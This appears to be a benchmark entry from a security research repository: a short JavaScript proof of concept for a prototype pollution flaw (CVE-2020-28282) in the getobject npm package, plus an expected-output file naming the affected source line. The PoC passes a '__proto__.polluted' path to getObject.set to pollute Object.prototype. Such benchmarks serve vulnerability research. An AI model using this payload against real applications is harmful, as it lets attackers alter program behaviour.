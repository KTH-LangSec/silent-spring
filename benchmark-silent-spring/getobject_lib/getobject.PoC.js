//https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28282
  const getObject = require("getobject");
  var obj = {};
  console.log("Before  : " + obj.polluted);
  getObject.set(obj, "__proto__.polluted", "yes");
