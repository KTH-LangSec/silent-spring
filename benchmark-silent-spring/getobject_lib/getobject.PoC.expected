node_modules/getobject/lib/getobject.js:48:23